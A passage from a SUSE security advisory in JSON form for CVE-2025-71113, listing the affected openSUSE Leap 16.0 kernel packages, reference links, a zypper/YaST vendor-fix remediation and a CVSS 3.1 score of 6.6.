"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71113",
"url": "https://www.suse.com/security/cve/CVE-2025-71113"
},
{
"category": "external",
"summary": "SUSE Bug 1256716 for CVE-2025-71113",
"url": "https://bugzilla.suse.com/1256716"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
